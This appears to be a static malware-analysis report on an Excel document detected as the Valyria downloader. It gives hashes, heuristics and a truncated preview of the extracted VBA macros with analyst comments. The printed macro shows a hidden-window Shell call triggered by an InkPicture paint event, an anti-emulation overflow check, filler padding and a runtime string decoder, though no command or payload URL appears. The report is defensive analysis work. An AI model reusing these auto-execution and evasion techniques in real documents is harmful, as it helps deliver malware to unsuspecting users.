Valyria — Office (OLE) malware analysis

Static analysis result for SHA-256 6ff12e83f44e19de…

MALICIOUS

Office (OLE)

64.5 KB · Created: 2018-09-21 09:15:35 · Authoring application: Microsoft Excel · First seen: 2019-04-18
MD5: 115bb64eb0cd27601062b28fe85170b8 SHA-1: f1bd1cc4354fa4c3ee21acc681101767cdc78fde SHA-256: 6ff12e83f44e19de6515c03108fccfd98abd3a70bbab1088171954a3c6113d3b
182 Risk Score

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1203 Exploitation for Client Execution

This Excel document contains VBA macros that leverage the Shell() function to execute arbitrary code, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The ClamAV detection name 'Xls.Downloader.Valyria-6704496-0' strongly suggests the 'Valyria' family and downloader functionality. On that basis the VBA script's primary purpose is assessed to be downloading and executing a second-stage payload; note that the command line passed to Shell() is decoded at runtime from UserForm control properties and is not present in the extracted source.

Heuristics 5

  • ClamAV: Xls.Downloader.Valyria-6704496-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Valyria-6704496-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://www.day.com/dam/1.0 — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4944 bytes
SHA-256: e8a328e33eef3d72b30a80fd30f86576fc7f6b101c177ae850ded73563848ba8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "InkPicture1, 84, 0, MSINKAUTLib, InkPicture"
' Entry point of the macro chain: event handler for the InkPicture1 control
' declared on the Attribute VB_Control line above (MSINKAUTLib.InkPicture).
' Presumably the Painted event fires whenever the control is drawn, i.e. as
' soon as the sheet is displayed, so this runs without any Workbook_Open /
' Auto_Open procedure — TODO confirm against the OLE_VBA_PCODE_AUTOEXEC_EXEC
' finding. hDC and Rect are ignored; the only action is the call below.
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
Message = "er"
' getErrorMessages (module "main") writes its first argument into the
' REG_ERR.been property; the 2 and 25 are never read by that procedure.
getErrorMessages Message, 2, 25
End Sub

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "REG_ERR"
Attribute VB_Base = "0{C89719B9-9B3C-409E-B420-247EAF574836}{8E4558ED-C173-443C-8EDA-7A2B8C08EB26}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Change handler for the bStackBelowHeap property/control on the REG_ERR
' form (the "_Change" suffix suggests an event procedure that presumably
' runs when not1 assigns REG_ERR.bStackBelowHeap — TODO confirm). This is
' where execution actually happens: the stored string is run via Shell.
Private Sub bStackBelowHeap_Change()
' The command line never appears in source; it is whatever iter() decoded
' into REG_ERR.bStackBelowHeap at runtime.
cfgfolder = REG_ERR.bStackBelowHeap
' dwVar is written 24 times and never read — filler that only pads the
' module (and its p-code) between the property read and the Shell call.
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
' Window style 0 (vbHide): the spawned process gets no visible window.
Shell cfgfolder, 0
End Sub

' Change handler for the REG_ERR.been property. getErrorMessages writes that
' property, which presumably fires this event and starts the decode in not1.
Private Sub been_Change()
not1
End Sub

Attribute VB_Name = "must"
' Orchestrates the decode: builds the command string from form-held data and
' stores it in the property whose Change handler calls Shell.
Public Sub not1()
fad = 101
On Error Resume Next
' CInt("30E+10000") overflows on a real VBA runtime; with Resume Next the
' error is swallowed and fad keeps its value of 101, so the If below is
' taken. An emulator that returns a value instead of raising would leave
' fad <> 101 and skip the payload — likely an anti-emulation check
' (inference; TODO confirm).
fad = CInt("30E+10000")
If fad = 101 Then
' iter() decodes REG_ERR.drov (ciphertext held on the form, not visible in
' source); the 1, 2, 3 arguments are ignored by iter.
REG_ERR.pSymFunctionTableAccess64 = iter(REG_ERR.drov, 1, 2, 3)
' Assigning bStackBelowHeap is what triggers bStackBelowHeap_Change -> Shell.
REG_ERR.bStackBelowHeap = REG_ERR.pSymFunctionTableAccess64
End If
End Sub

Attribute VB_Name = "main"
' Module "main": called from InkPicture1_Painted with ("er", 2, 25). Only
' `file` is used; arg2 and arg3 are decoys. Writing REG_ERR.been presumably
' fires been_Change, which calls not1.
Public Sub getErrorMessages(file, arg2, arg3)
REG_ERR.been = file
End Sub

Attribute VB_Name = "basedefs"
' Not called from any visible procedure. Assigns dwVar repeatedly and never
' reads it — dead padding, the same filler pattern used inside
' bStackBelowHeap_Change.
Sub test()
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
End Sub

' Decoder entry point. Returns the string obtained by substituting every
' character of TODO (the ciphertext) through GetExceptionCode. p1, p2 and
' p3 are never used.
Function iter(TODO, p1, p2, p3)
' Output accumulator, filled by reference by GetExceptionCode.
dependency = ""
' CYGWIN is written 25 times; only the final `1 - 0` matters, so the
' recursion starts at 1-based character index 1.
CYGWIN = 1
CYGWIN = 100
CYGWIN = 99
CYGWIN = 98
CYGWIN = 97
CYGWIN = 96
CYGWIN = 95
CYGWIN = 94
CYGWIN = 93
CYGWIN = 92
CYGWIN = 91
CYGWIN = 90
CYGWIN = 89
CYGWIN = 88
CYGWIN = 87
CYGWIN = 86
CYGWIN = 85
CYGWIN = 84
CYGWIN = 83
CYGWIN = 82
CYGWIN = 81
CYGWIN = 80
CYGWIN = 79
CYGWIN = 78
CYGWIN = 1 - 0
' Walks TODO from position CYGWIN to its end, appending one decoded
' character per step into `dependency`.
GetExceptionCode CYGWIN, dependency, TODO
iter = dependency
End Function

' Recursive per-character decode loop. C is the current 1-based index into
' `contrary` (the ciphertext); fpUnDecorateSymbolName is the ByRef output
' accumulator. One frame per remaining character, so recursion depth is
' Len(contrary) - C + 1.
Private Sub GetExceptionCode(ByRef C, ByRef fpUnDecorateSymbolName, contrary)
BUS_MCEERR_AO = Len(contrary)
If C <= BUS_MCEERR_AO Then
' Right(Left(s, C), 1) is the C-th character of s. It is turned into a
' number by PIMAGEHLP_SYMBOL64 (its definition is truncated in this
' listing), offset by 4 and looked up in the alphabet by xml().
fpUnDecorateSymbolName = fpUnDecorateSymbolName + xml(PIMAGEHLP_SYMBOL64(Right(Left(contrary, C), 1)), 4)
C = C + 1
GetExceptionCode C, fpUnDecorateSymbolName, contrary
End If
End Sub

' Alphabet lookup: returns the single character at 1-based position
' (pUnDecorateSymbolName - oss) in REG_ERR.General, wrapping from the end
' when that position drops below 1. REG_ERR.General is a string held on the
' form — presumably the decoding alphabet; its contents are not in source.
Function xml(pUnDecorateSymbolName, oss)
If pUnDecorateSymbolName - oss < 1 Then
' Wrap-around: index 0 -> last character, -1 -> second to last, and so on.
xml = Right(Left(REG_ERR.General, Len(REG_ERR.General) + pUnDecorateSymbolName - oss), 1)
Else
xml = Right(Left(REG_ERR.General, pUnDecorateSymbolName - oss), 1)
End If
End Function

Function PIMAGEHLP_SYMBOL64(entries)
LPSTACKFRAME64 = 1
Signalmap_t = 1
alignment LPSTACKFRAME64, Signalmap_t, 
... (truncated)